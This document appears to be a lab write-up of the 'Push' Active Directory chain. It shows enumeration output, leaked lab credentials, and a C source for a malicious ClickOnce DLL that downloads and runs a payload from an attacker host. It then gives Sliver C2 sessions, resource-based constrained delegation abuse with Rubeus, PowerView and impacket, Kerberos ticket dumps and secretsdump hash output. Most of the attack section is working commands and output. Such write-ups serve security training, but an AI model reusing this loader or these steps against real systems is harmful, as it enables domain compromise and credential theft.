Push (Chain)
Machine information
Credentials
Username
Password
Method
Scope
olivia.wood
DeployTrust07
Leaked on FTP Service
Domain User
kelly.hill
ShinraTensei!
Found into .git files
Domain User
sccadmin
7ujm&UJM
SCCM Relay Attack
Domain User
✅ Valid Usernames
Administrator
Guest
krbtgt
svcsql
Michelle.Randall
Olivia.Wood
Declan.Hall
Lauren.Saunders
Sharon.Mitchell
Sheila.Stokes
Kathleen.Horton
Melissa.Murray
Amber.Robson
Kelly.Hill
Michelle.Dale
Alice.Young
Allan.Little
Charlotte.Reed
Barry.Murphy
Oliver.Lowe
Charles.Barber
Colin.Brown
Aaron.May
Hilary.Simpson
Leanne.Wilson
Stanley.Sharp
Mohamed.Patel
Ashley.Holden
Lewis.Wood
Bruce.Ali
Danny.Savage
Paige.Finch
Brian.Berry
Connor.James
sccadmin🔑 Passwords list
DeployTrust07
ShinraTensei!Password Policy
Minimum password length: 7
Password history length: 24
Maximum password age: 41 days 23 hours 53 minutes
Password Complexity Flags: 000001
Domain Refuse Password Change: 0
Domain Password Store Cleartext: 0
Domain Password Lockout Admins: 0
Domain Password No Clear Change: 0
Domain Password No Anon Change: 0
Domain Password Complex: 1
Minimum password age: 1 day 4 minutes
Reset Account Lockout Counter: 10 minutes
Locked Account Duration: 10 minutes
Account Lockout Threshold: None
Forced Log off Time: Not SetInformation Gathering
DC01.push.Vl
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-12 09:45:12Z)
135/tcp open msrpc Microsoft Windows
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: push.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.push.vl
| Subject Alternative Name: DNS:DC01.push.vl
| Issuer: commonName=DC01.push.vl
443/tcp open ssl/https
|_ssl-date: TLS randomness does not represent time
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=DC01.push.vl
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PUSH
| NetBIOS_Domain_Name: PUSH
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: push.vl
| DNS_Computer_Name: DC01.push.vl
| DNS_Tree_Name: push.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-10-12T09:35:36+00:00
| ssl-cert: Subject: commonName=DC01.push.vl
| Issuer: commonName=DC01.push.vl
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
61236/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
61265/tcp open msrpc Microsoft Windows RPC
MS01.push.vl
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 08-03-23 08:49PM <DIR> .config
| 08-03-23 08:49PM <DIR> .git
|_08-03-23 08:49PM <DIR> dev
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: SelfService
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-10-12T09:36:17+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: PUSH
| NetBIOS_Domain_Name: PUSH
| NetBIOS_Computer_Name: MS01
| DNS_Domain_Name: push.vl
| DNS_Computer_Name: MS01.push.vl
| DNS_Tree_Name: push.vl
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)Service enumeration
DC01
DNS
Not vulnerable to AXFR
SMB
Domain SID: S-1-5-21-1451457175-172047642-1427519037
NetBIOS: DC01
Domain: push.vl
FQDN: DC01.push.vl
SMB signing: true
Server allows null session authentication
HTTP/S
Default IIS website
MS01
FTP
Anonymous FTP login allowed
SMB
SMB signing : false (Vulnerable to NTLM Relay Attacks)
HTTP
ClickOnce is a Microsoft deployment technology that allows Windows-based applications to be installed and run with minimal user interaction—often launched from a URL or shared resource. It supports sandboxing, auto-updating, and limited permission execution, but security often relies heavily on publisher configuration and system policy.
Domain
Not asreproastable users
Not kerberoastable users.
User: olivia.wood
wwwroot folder with Read and Write permission
coerce_plus
VULNERABLE, DFSCoerce
VULNERABLE, PetitPotam
VULNERABLE, PrinterBug
VULNERABLE, MSEven
Spooler service enabled
Not Webdav
Found PKI Enrollment Server: MS01.push.vl
Certificate authority - Found PKI Enrollment Server: MS01.push.vl
LDAP
LDAP Signing NOT Enforced!
LDAPS Channel Binding is set to "NEVER"
MachineAccountQuota: 10
Compromise MS01 Server
Download FTP files
❯ wget -m --no-passive ftp://ftp:ftp@MS01.PUSH.VLFile: .git-credentials
--------------------------------------------
https://olivia.wood:DeployTrust07@github.comDiscovering excessive permission on folder
❯ nxc smb MS01 -u 'olivia.wood' -p 'DeployTrust07' --shares
SMB 10.10.230.150 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:push.vl) (signing:False) (SMBv1:False)
SMB 10.10.230.150 445 MS01 [+] push.vl\olivia.wood:DeployTrust07
SMB 10.10.230.150 445 MS01 [*] Enumerated shares
SMB 10.10.230.150 445 MS01 Share Permissions Remark
SMB 10.10.230.150 445 MS01 ----- ----------- ------
SMB 10.10.230.150 445 MS01 ADMIN$ Remote Admin
SMB 10.10.230.150 445 MS01 C$ Default share
SMB 10.10.230.150 445 MS01 IPC$ READ Remote IPC
SMB 10.10.230.150 445 MS01 wwwroot READ,WRITE clickonce application dev shareAbusing ClickOnce to gain initial Access
During the enumeration the tester found a Clickonce application running on MS01. This application in together with the previously user found gave the tester the opportunity to gain initial access into the MS01 Server.
Interesting blog: Backdooring ClickOnce .NET Apps for Initial Access: A Practical Example
Creating the malicious dll payload
To compromise the Clickonce the tester proceeded to create the next DLL as follows:
#include <windows.h>
#include <stdio.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
WinExec("cmd.exe /c curl 10.8.5.48:8081/http-vulnlabs-4444.exe -o C:\\Windows\\Temp\\http-vulnlabs-4444.exe", SW_HIDE);
CreateProcessA(
"C:\\Windows\\Temp\\http-vulnlabs-4444.exe",
NULL,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi
);
}
return TRUE;
}
Compiling DLL on Linux
x86_64-w64-mingw32-gcc -shared -o SelfService.dll.deploy payload.c -lws2_32Calculating HASH and Size of DLL to manifest file
stat -c%s SelfService.dll.deploy
openssl dgst -binary -sha256 SelfService.dll.deploy | openssl enc -base64Editing SelfService.dll.manifest
<file name="SelfService.dll" size="SIZE">
<hash>
<dsig:Transforms>
<dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
</dsig:Transforms>
<dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
<dsig:DigestValue>HASH_BASE64</dsig:DigestValue>
</hash>
</file>Removing signature and publisherIdentity tags.
<publisherIdentity ... />
<Signature>...</Signature>Changing the publicKeyToken to 0000000000000000
<assemblyIdentity ... publicKeyToken="0000000000000000" ... />Recalculating the new edited .manifest file
stat -c%s SelfService.dll.manifest
openssl dgst -binary -sha256 SelfService.dll.manifest | openssl enc -base64Editing SelfService.application
Updating Size, dsig:DigestValue , publicKeyToken=0000000000000000 (both) and remove signature and publisherIdentity tags.
Discovering kelly.hill's plaintext credentials
sliver (http-vulnlabs-4444) > ls
C:\Users\kelly.hill (31 items, 2.2 MiB)
=======================================
-rw-rw-rw- .git-credential 43 B Sat Aug 05 10:07:54 +0000 2023
<SNIF> <dir> Sat Sep 02 10:20:48 +0000 2023
sliver (http-vulnlabs-4444) > cat .git-credential
https://kelly.hill:ShinraTensei!@github.comPath 1: Privilege escalation on MS01 via RBCD (Windows)
Abusing Resource Base Constrained Delegation
sliver (http-vulnlabs-4444) > execute-assembly /home/Intrusionz3r0/Documents/Tools/Sharpmad.exe MAQ -Action new -MachineAccount z3r0 -MachinePassword Password123
[*] Output:
[+] Machine account z3r0 added
sliver (http-vulnlabs-4444) > shell
PS C:\Temp> Import-Module .\PowerView.ps1
PS C:\Temp> $ComputerSid = Get-DomainComputer z3r0 -Properties objectsid | Select -Expand objectsid
PS C:\Temp> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\Temp> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\Temp> $SD.GetBinaryForm($SDBytes, 0)
PS C:\Temp> $credentials = New-Object System.Management.Automation.PSCredential "PUSH\kelly.hill", (ConvertTo-SecureString "ShinraTensei!" -AsPlainText -Force)
PS C:\Temp> Get-DomainComputer MS01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'PUSH' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.push.vl/DC=push,DC=vl
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Extracted domain 'push.vl' from 'CN=MS01,CN=Computers,DC=push,DC=vl'
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.PUSH.VL/DC=push,DC=vl
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(distinguishedname=CN=MS01,CN=Computers,DC=push,DC=vl)))
VERBOSE: [Set-DomainObject] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0 0
36 0 0 0 1 2 0 0 0 0 0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 151 122 131 86
26 61 65 10 61 54 22 85 18 14 0 0' for object 'MS01$'Requesting TGS using S4U to impersonate Administrator
sliver (http-vulnlabs-4444) > rubeus s4u /user:z3r0$ /impersonateuser:administrator /msdsspn:cifs/MS01.push.vl /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /outfile:administrator
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: S4U
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'push.vl\z3r0$'
[*] Using domain controller: 10.10.166.229:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFHjCCBRqgAwIBBaEDAgEWooIERTCCBEFhggQ9MIIEOaADAgEFoQkbB1BVU0guVkyiHDAaoAMCAQKh
EzARGwZrcmJ0Z3QbB3B1c2gudmyjggQHMIIEA6ADAgESoQMCAQKiggP1BIID8XJ9n/CzgAurmnc+Dyo5
yQp5wWDkBhaNYz0qWGKz4fuv9enG//t7YZEbP3dmVICd8Ibay91pyWzA7NSQZoRo1y1EWmsOnSqNoK4d
JqkLt4DumjEEUUq01Sa2z1XXn+wYfSVM7bJwYq5ruj+LbdlBIuTgpBj8Cr8cWDHImyPDCm19pmEd0BZN
EN1ZfUq7RcLbTPkSV0LBahZgXmRfZ3tRa319sG6GsP6ptc9DO3SpTdD9SL48gSKTDhGGvDOofa3v/hez
68hgIDdmRaXfC1j+0vfk6nCJcpBkBG2Y1pX+nrAC9wSnwrWc6vJF5G/mOxuUCC3woYVzjfBRCTKzuBln
J6ndm3fTqCRpE7GYFk2cVZW+MR+rLwdqy2nPaZjObDOk0cxYfwgJYB8nYgplXvSX3GzkYS8e7KM4CIIG
mNh00mEmGbc2wRVcvTObXqaIDxUL5YRo0w6lsvm4pKmo+RpFuHwaKZN12S38El2x6mzBgJBijWNtGdq/
Hwe6BDe0o12QeocQJl1L+VzIczsWCdbBHJq7AcYVIZaH0PcwEVL2KWg3RTXXdrhE4HljKHxuOfE+E9nI
LZKPmwALhtvzySW7QCK7VQCUQcL2hTqpctnUiXNPnXdtPV0xEYbQ3/rerTTnKbVTbW6PhB8C37gU6Wzf
amT4VHZlom9JsMkPSWXlwzFdKOzyBjVRMFtCQwhhIZYr5pMJ++YbNNyKv8424YbG7WliJRBNoY+8ft9R
2c42XMIVNHLxrMOMYbS1U2iv0UtC7Vjl+apIhwhfyn64zjpRDp9VhjHb2PhuH4dZiOQ9HUP2j+TjYidH
aYg35Bn3VDZy0CYMZxhMOrrcRnUvjQu0v97DzU7tLE2ZExeuxUOQhL+RRwQFlm9nq6aiH/SYI5dLzRQo
sB0Z2mdptldRw+bfYE5xFkmrNuIJybf1EfQ9Imro+N3v2kslbQfY1ayykgZl95JQ2xva/5N2qv0hokKQ
ICKKcX2aQ9eLu/Y1DQp4aQ8QvJT5s9yYR+UHKkuerRtn+/0QvdjAyEqLsIPhzp4byr/Bi/G33YcQUPt5
O7JR6o/1fwgY6J8yS/Dr6qoIWD8ZGRU/kKbQtsRipQG8KGqPiyqtNRQOzulU1a07QgJXI6kJcq5uPTtW
6TzRs7VJ2sYdbqGRu6BRH0RjbA1+4EgPGf2uYmueOLiZUh60QFD6ImFPD5CzS+QrFe2BbyKOySb0eYQn
P7D2NcPAabvyD4Xj01N4JvtH+VjGY+Imbt4mtqsVuqjut8kBwuo74DoOqMvhZ/7qoR13G5vetpaXeBwv
f/6h2cisVjiuZN3AoN8YbHRDmzfmKC1cveAcKYU2T0kxgxajgcQwgcGgAwIBAKKBuQSBtn2BszCBsKCB
rTCBqjCBp6AbMBmgAwIBF6ESBBAZPVwcrAVWoh3ahau8lJ87oQkbB1BVU0guVkyiEjAQoAMCAQGhCTAH
GwV6M3IwJKMHAwUAQOEAAKURGA8yMDI1MDUxMjA2MDI0OVqmERgPMjAyNTA1MTIxNjAyNDlapxEYDzIw
MjUwNTE5MDYwMjQ5WqgJGwdQVVNILlZMqRwwGqADAgECoRMwERsGa3JidGd0GwdwdXNoLnZs
[*] Action: S4U
[*] Building S4U2self request for: 'z3r0$@PUSH.VL'
[*] Using domain controller: DC01.push.vl (10.10.166.229)
[*] Sending S4U2self request to 10.10.166.229:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'z3r0$@PUSH.VL'
[*] base64(ticket.kirbi):
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
[*] Impersonating user 'administrator' to target SPN 'cifs/MS01.push.vl'
[*] Building S4U2proxy request for service: 'cifs/MS01.push.vl'
[*] Using domain controller: DC01.push.vl (10.10.166.229)
[*] Sending S4U2proxy request to domain controller 10.10.166.229:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/MS01.push.vl':
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
TVMwMS5wdXNoLnZs
[*] Ticket written to administrator_cifs_MS01.push.vl
[+] Ticket successfully imported!
liver (http-vulnlabs-4444) > download administrator_cifs_MS01.push.vl
[*] Wrote 1632 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Sliver/administrator_cifs_MS01.push.vlDumping SAM database and LSA Secrets
❯ impacket-ticketConverter admin2.kirbi admin2.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
❯ KRB5CCNAME=admin2.ccache impacket-secretsdump -k MS01.PUSH.VL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8614aef7e81821c71123195fd93f661:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#3347d36e92ac0b3c7f9c9fff05083e09: (2023-08-31 18:27:31)
push.vl/Kelly.Hill:$DCC2$10240#Kelly.Hill#b084064849c9a1acba2fd9d4e60d6029: (2025-05-12 03:34:55)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c59b319594744abea7f2db17a2fa65c: (2023-08-31 10:26:08)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUSH\MS01$:plain_password_hex:a8588fd11b4f63e1b5a84c2d2cdc4bcae3545f793c7228a77e1ad868edbb9e701ab3e81c4d8c864e58b3d7a01faaeff9facf4536a4129cdae629bdbf445c5a66e6bd6382f3e9184613bdb6031d6c0e04cd123e26ce746c5f0727e81e78ac7d69f2b9b7f5b5d8d8c5c8019e03a7333a5cca60683f3d9c72b0a828bcd04d36a0ba5fd99774d76d609d632641a2047be57041bd3d331872416ba5309f323219cd8d2c608e17153e731a689adfcf7a0163d84477cc1f2d60d63a61b5056a15d2ab00394db19fe60c91380a6495a824b63bf3008de0dbd74b044b5e04a4741f71a1dd224fc60e35c19eb226848814b101c6f6
PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:31fd133d27babb3790e451b6aeea7886:::
[*] DefaultPassword
PUSH\kelly.hill:ShinraTensei!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x83f7bbd4976dba3418fe397e76d9690c06ee3691
dpapi_userkey:0xe2af091346d181301ff638320e3246e49b9b637c
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
[*] Stopping service RemoteRegistryPath 1: Privilege escalation on MS01 via RBCD (Linux)
Creating Computer Account
❯ impacket-addcomputer 'push.vl/kelly.hill:ShinraTensei!' -computer-name 'Intrusion' -computer-pass 'Password123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account Intrusion$ with password Password123.Writing msds-allowedtoactonbehalfofotheridentity attribute to MS01
❯ impacket-rbcd -delegate-from Intrusion$ -delegate-to MS01$ -action write 'push.vl/kelly.hill:ShinraTensei!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[*] z3r0$ (S-1-5-21-1451457175-172047642-1427519037-3602)
[*] Delegation rights modified successfully!
[*] Intrusion$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] z3r0$ (S-1-5-21-1451457175-172047642-1427519037-3602)
[*] Intrusion$ (S-1-5-21-1451457175-172047642-1427519037-3603)Requesting Ticket TGS to impersonate Administrator
❯ impacket-getST 'push.vl/Intrusion$:Password123' -spn 'CIFS/MS01.PUSH.VL' -impersonate Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_MS01.PUSH.VL@PUSH.VL.ccacheDumping SAM database and LSA Secrets
❯ KRB5CCNAME='Administrator@CIFS_MS01.PUSH.VL@PUSH.VL.ccache' impacket-secretsdump -k -no-pass MS01.PUSH.VL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8614aef7e81821c71123195fd93f661:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#3347d36e92ac0b3c7f9c9fff05083e09: (2023-08-31 18:27:31)
push.vl/Kelly.Hill:$DCC2$10240#Kelly.Hill#b084064849c9a1acba2fd9d4e60d6029: (2025-05-12 03:34:55)
